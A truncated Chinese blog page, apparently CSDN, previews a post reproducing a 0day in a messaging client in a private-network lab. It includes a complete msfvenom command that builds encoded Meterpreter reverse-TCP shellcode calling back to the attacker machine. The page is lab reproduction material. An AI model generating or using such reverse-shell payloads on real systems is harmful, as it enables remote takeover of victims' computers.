- 博客(1)
- 收藏
- 关注
原创 某信0day漏洞复现
测试流程:攻击机:kali,192.168.43.200受害机:win10,192.168.43.107测试版本:首先生成一段shellcode:msfvemon -p windows/meterpreter/reverse_tcp lhost=192.168.43.200 lport=5555 -e x86/shikata_ga_nai -b "\x00" -i 15 -f num -o /root/payload.txt此时在root用户家目录下生成了一段shellcode代码的txt文
2021-04-19 14:34:18
527
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅